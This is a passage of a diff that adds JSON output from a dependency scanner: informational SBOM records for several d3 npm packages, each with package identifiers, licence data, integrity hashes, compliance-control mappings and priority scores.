"Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fe1c10f297b89c50", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-format 3.1.2", + "title": "d3-format 3.1.2", + "description": "Package discovered: d3-format 3.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5199669646af57ab", + "name": "d3-format", + "version": "3.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-format@3.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz", + "integrity": "sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d580ebf8b65eecc5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-interpolate 3.0.1", + "title": "d3-interpolate 3.0.1", + "description": "Package discovered: d3-interpolate 3.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2bcd6b2445ac379d", + "name": "d3-interpolate", + "version": "3.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-interpolate@3.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz", + "integrity": "sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g==", + "dependencies": { + "d3-color": "1 - 3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9d53314d3544b04e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-path 3.1.0", + "title": "d3-path 3.1.0", + "description": "Package discovered: d3-path 3.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "63d3c4d24d9be1d5", + "name": "d3-path", + "version": "3.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-path@3.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz", + "integrity": "sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "964951e667c4c379", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-scale 4.0.2", + "title": "d3-scale 4.0.2", + "description": "Package discovered: d3-scale 4.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6f08c8eb1953f0ad", + "name": "d3-scale", + "version": "4.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-scale@4.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz", + "integrity": "sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ==", + "dependencies": { + "d3-array": "2.10.0 - 3", + "d3-format": "1 - 3", + "d3-interpolate": "1.2.0 - 3", + "d3-time": "2.1.1 - 3", + "d3-time-format": "2 - 4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fdbd8e26e660bbf2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-shape 3.2.0", + "title": "d3-shape 3.2.0", + "description": "Package discovered: d3-shape 3.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "62919ef646dbae92", + "name": "d3-shape", + "version": "3.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-shape@3.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz", + "integrity": "sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA==", + "dependencies": { + "d3-path": "^3.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "53764226f7fa140f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-time 3.1.0", + "title": "d3-time 3.1.0", + "description": "Package discovered: d3-time 3.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "809edf0f6cbf0d31", + "name": "d3-time", + "version": "3.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-time@3.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz", + "integrity": "sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q==", + "dependencies": { + "d3-array": "2 - 3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e86c38bd447bf3a0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-time-format 4.1.0", + "title": "d3-time-format 4.1.0", + "description": "Package discovered: d3-time-format 4.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4c75f293b12c6086", + "name": "d3-time-format", + "version": "4.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-time-format@4.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz", + "integrity": "sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg==", + "dependencies": { + "d3-time": "1 - 3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "014411da08f2c5cc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: d3-timer 3.0.1", + "title": "d3-timer 3.0.1", + "description": "Package discovered: d3-timer 3.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1f58b04c062182d6", + "name": "d3-timer", + "version": "3.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/d3-timer@3.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz", + "integrity": "sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + 